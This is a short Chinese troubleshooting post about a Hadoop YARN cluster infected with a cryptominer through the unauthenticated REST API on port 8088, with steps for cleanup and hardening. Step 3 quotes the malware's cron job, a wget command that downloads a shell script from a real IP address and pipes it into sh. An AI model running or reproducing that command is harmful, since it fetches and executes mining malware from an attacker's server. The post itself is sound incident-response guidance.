yarn一直在跑一个用户为dr.who的application

现象：

访问yarn:8088页面发现一直有任务在跑如图：

用户为dr.who，问下内部使用人员，都没有任务在跑；

结论：

恭喜你，你中毒了，攻击者利用Hadoop Yarn资源管理系统REST API未授权漏洞对服务器进行攻击，攻击者可以在未授权的情况下远程执行代码的安全问题进行预警

用top命令发现cpu使用了360%多，系统会很卡。

解决办法：

1，通过查看占用cpu高得进程，kill掉此进程

2，检查/tmp和/var/tmp目录，删除java、ppc、w.conf等异常文件

3 ，通过crontab -l 查看有一个* * * * * wget -q -O - http://46.249.38.186/cr.sh | sh > /dev/null 2>&1任务，删除此任务

4，排查YARN日志，确认异常的application，删除处理

再通过top验证看是否还有高cpu进程，如果有，kill掉，没有的话应该正常了。

注意：YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作，如果配置不当，REST API将会开放在公网导致未授权访问的问题，那么任何黑客则就均可利用其进行远程命令执行，从而进行挖矿等行为，黑客直接利用开放在8088的REST API提交执行命令，来实现在服务器内下载执行.sh脚本，从而再进一步下载启动挖矿程序达到挖矿的目的，因此注意并启用Kerberos认证功能，禁止匿名访问修改8088端口